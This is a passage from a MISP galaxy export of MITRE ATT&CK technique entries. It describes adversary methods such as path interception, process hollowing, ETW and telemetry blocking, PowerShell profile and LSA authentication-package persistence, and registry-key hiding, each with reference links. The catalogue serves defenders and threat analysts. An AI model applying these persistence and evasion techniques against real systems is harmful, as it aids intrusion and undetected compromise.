When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

The tag is: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029"

Table 6210. Table References

Links

https://attack.mitre.org/techniques/T1029

Shadow DNS - T1340

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1340).

The process of gathering domain account credentials in order to silently create subdomains pointed at malicious servers without tipping off the actual owner. (Citation: CiscoAngler) (Citation: ProofpointDomainShadowing)

The tag is: misp-galaxy:mitre-attack-pattern="Shadow DNS - T1340"

Table 6211. Table References

Links

https://attack.mitre.org/techniques/T1340

https://blogs.cisco.com/security/talos/angler-domain-shadowing

Path Interception - T1034

This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).

Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)

There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.

Unquoted Paths

Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\unsafe path with space\program.exe</code> vs. <code>"C:\safe path with space\program.exe"</code>). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is <code>C:\program files\myapp.exe</code>, an adversary may create a program at <code>C:\program.exe</code> that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)

PATH Environment Variable Misconfiguration

The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, <code>%SystemRoot%\system32</code> (e.g., <code>C:\Windows\system32</code>), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.

For example, if <code>C:\example path</code> precedes <code>C:\Windows\system32</code> is in the PATH environment variable, a program that is named net.exe and placed in <code>C:\example path</code> will be called instead of the Windows system "net" when "net" is executed from the command-line.

Search Order Hijacking

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program’s directory.

For example, "example.exe" runs "cmd.exe" with the command-line argument <code>net user</code>. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then <code>cmd.exe /C net user</code> will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property)

Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).

The tag is: misp-galaxy:mitre-attack-pattern="Path Interception - T1034"

Table 6212. Table References

Links

http://msdn.microsoft.com/en-us/library/ms682425

http://msdn.microsoft.com/en-us/library/ms687393

http://support.microsoft.com/KB/103000

http://technet.microsoft.com/en-us/library/cc723564.aspx#XSLTsection127121120120

https://attack.mitre.org/techniques/T1034

https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/

https://capec.mitre.org/data/definitions/159.html

https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464

https://msdn.microsoft.com/en-us/library/fd7hxfdd.aspx

https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/

https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/

Location Tracking - T1430

Adversaries may track a device’s physical location through use of standard operating system APIs via malicious or exploited applications on the compromised device.

On Android, applications holding the ACCESS_COAURSE_LOCATION or ACCESS_FINE_LOCATION permissions provide access to the device’s physical location. On Android 10 and up, declaration of the ACCESS_BACKGROUND_LOCATION permission in an application’s manifest will allow applications to request location access even when the application is running in the background.(Citation: Android Request Location Permissions) Some adversaries have utilized integration of Baidu map services to retrieve geographical location once the location access permissions had been obtained.(Citation: PaloAlto-SpyDealer)(Citation: Palo Alto HenBox)

On iOS, applications must include the NSLocationWhenInUseUsageDescription, NSLocationAlwaysAndWhenInUseUsageDescription, and/or NSLocationAlwaysUsageDescription keys in their Info.plist file depending on the extent of requested access to location information.(Citation: Apple Requesting Authorization for Location Services) On iOS 8.0 and up, applications call requestWhenInUseAuthorization() to request access to location information when the application is in use or requestAlwaysAuthorization() to request access to location information regardless of whether the application is in use. With elevated privileges, an adversary may be able to access location data without explicit user consent with the com.apple.locationd.preauthorized entitlement key.(Citation: Google Project Zero Insomnia)

The tag is: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"

Table 6213. Table References

Links

https://attack.mitre.org/techniques/T1430

https://developer.android.com/training/location/permissions

https://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_services

https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-24.html

https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/

https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/

Service Execution - T1035

Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.

The tag is: misp-galaxy:mitre-attack-pattern="Service Execution - T1035"

Table 6214. Table References

Links

https://attack.mitre.org/techniques/T1035

Anonymity services - T1306

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1306).

Anonymity services reduce the amount of information available that can be used to track an adversary’s activities. Multiple options are available to hide activity, limit tracking, and increase anonymity. (Citation: TOR Design) (Citation: Stratfor2012)

The tag is: misp-galaxy:mitre-attack-pattern="Anonymity services - T1306"

Table 6215. Table References

Links

https://attack.mitre.org/techniques/T1306

Process Hollowing - T1093

Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Elastic Process Injection July 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1093"

Table 6216. Table References

Links

http://www.autosectools.com/process-hollowing.pdf

https://attack.mitre.org/techniques/T1093

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Obfuscate infrastructure - T1309

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1309).

Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: LUCKYCAT2012)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1309"

Obfuscate infrastructure - T1309 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1331" with estimative-language:likelihood-probability="almost-certain"

Table 6217. Table References

Links

https://attack.mitre.org/techniques/T1309

Indicator Blocking - T1054

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1086) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).

ETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell Set-EtwTraceProvider cmdlet or by interfacing directly with the registry to make alterations.

In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1054"

Table 6218. Table References

Links

https://attack.mitre.org/techniques/T1054

https://capec.mitre.org/data/definitions/571.html

https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events

https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A

Code Injection - T1540

Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application. Code is then executed or interpreted by that application. Adversaries utilizing this technique may exploit capabilities to load code in at runtime through dynamic libraries.

With root access, ptrace can be used to target specific applications and load shared libraries into its process memory.(Citation: Shunix Code Injection Mar 2016)(Citation: Fadeev Code Injection Aug 2018) By injecting code, an adversary may be able to gain access to higher permissions held by the targeted application by executing as the targeted application. In addition, the adversary may be able to evade detection or enable persistent access to a system under the guise of the application’s process.(Citation: Google Triada June 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Code Injection - T1540"

Table 6219. Table References

Links

https://attack.mitre.org/techniques/T1540

https://fadeevab.com/shared-library-injection-on-android-8/

https://security.googleblog.com/2019/06/pha-family-highlights-triada.html

https://shunix.com/shared-library-injection-in-android/

PowerShell Profile - T1504

Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1504"

Table 6220. Table References

Links

http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf

https://attack.mitre.org/techniques/T1504

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-6

https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html

https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

Software Packing - T1045

Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.

Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.

Adversaries may use virtual machine software protection as a form of software packing to protect their code. Virtual machine software protection translates an executable’s original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Software Packing - T1045"

Table 6221. Table References

Links

http://en.wikipedia.org/wiki/Executable_compression

https://attack.mitre.org/techniques/T1045

https://capec.mitre.org/data/definitions/570.html

https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf

Biometric Spoofing - T1460

An adversary could attempt to spoof a mobile device’s biometric authentication mechanism, for example by providing a fake fingerprint as described by SRLabs in (Citation: SRLabs-Fingerprint).

iOS partly mitigates this attack by requiring the device passcode rather than a fingerprint to unlock the device after every device restart and after 48 hours since the device was last unlocked (Citation: Apple-TouchID).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Biometric Spoofing - T1460"

Biometric Spoofing - T1460 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"

Table 6222. Table References

Links

https://attack.mitre.org/techniques/T1460

Data Staged - T1074

Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)

Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.

The tag is: misp-galaxy:mitre-attack-pattern="Data Staged - T1074"

Table 6223. Table References

Links

https://attack.mitre.org/techniques/T1074

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf

Execution Guardrails - T1480

Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)

Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.

The tag is: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480"

Table 6224. Table References

Links

https://attack.mitre.org/techniques/T1480

https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/

https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html

Process Injection - T1055

Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.

The tag is: misp-galaxy:mitre-attack-pattern="Process Injection - T1055"

Table 6225. Table References

Links

http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing

https://attack.mitre.org/techniques/T1055

https://docs.microsoft.com/sysinternals/downloads/sysmon

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.gnu.org/software/acct/

Acquire Access - T1650

Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)

Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service)

By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)

In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).

Note: while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Acquire Access - T1650"

Table 6226. Table References

Links

https://attack.mitre.org/techniques/T1650

https://krebsonsecurity.com/2012/10/service-sells-access-to-fortune-500-firms/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-152a

https://www.crowdstrike.com/blog/access-brokers-targets-and-worth/

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

Input Capture - T1056

Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Input Capture - T1056"

Table 6227. Table References

Links

http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf

https://attack.mitre.org/techniques/T1056

Process Discovery - T1057

Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via /proc.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as show processes can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)

The tag is: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057"

Table 6228. Table References

Links

https://attack.mitre.org/techniques/T1057

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/show_monitor_permit_list_through_show_process_memory.html#wp3599497760

https://www.us-cert.gov/ncas/alerts/TA18-106A

Stage Capabilities - T1608

Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)

Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):

The tag is: misp-galaxy:mitre-attack-pattern="Stage Capabilities - T1608"

Table 6229. Table References

Links

http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/

https://attack.mitre.org/techniques/T1608

https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://www.digicert.com/kb/ssl-certificate-installation.htm

https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/

https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html

https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku

https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service

https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian

https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/

Account Discovery - T1087

Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.

For examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.

The tag is: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087"

Table 6230. Table References

Links

https://attack.mitre.org/techniques/T1087

https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

Valid Accounts - T1078

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)

The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)

The tag is: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"

Table 6231. Table References

Links

https://attack.mitre.org/techniques/T1078

https://technet.microsoft.com/en-us/library/dn487457.aspx

https://technet.microsoft.com/en-us/library/dn535501.aspx

https://www.cisa.gov/uscert/ncas/alerts/aa22-074a

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

Multilayer Encryption - T1079

An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.

The tag is: misp-galaxy:mitre-attack-pattern="Multilayer Encryption - T1079"

Table 6232. Table References

Links

http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1079

https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html

https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf

Account Manipulation - T1098

Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials.

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098"

Table 6233. Table References

Links

https://attack.mitre.org/techniques/T1098

https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738

https://github.com/gentilkiwi/mimikatz/issues/92

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4670

Modify Registry - T1112

Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system’s [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.

The tag is: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"

Table 6234. Table References

Links

https://attack.mitre.org/techniques/T1112

https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/

https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull

https://docs.microsoft.com/sysinternals/downloads/reghide

https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657

https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353

https://technet.microsoft.com/en-us/library/cc732643.aspx

https://technet.microsoft.com/en-us/library/cc754820.aspx

Authentication Package - T1131

Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)

Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=<target binary></code>. The binary will then be executed by the system when the authentication packages are loaded.

The tag is: misp-galaxy:mitre-attack-pattern="Authentication Package - T1131"

Table 6235. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/techniques/T1131

https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx

https://technet.microsoft.com/en-us/library/dn408187.aspx

Screen Capture - T1113

Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113"

Table 6236. Table References

Links

https://attack.mitre.org/techniques/T1113

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8

Dynamic DNS - T1311

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1311).

Dynamic DNS is a method of automatically updating a name in the DNS system. Providers offer this rapid reconfiguration of IPs to hostnames as a service. (Citation: DellMirage2012)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1311"

Dynamic DNS - T1311 has relationships with:

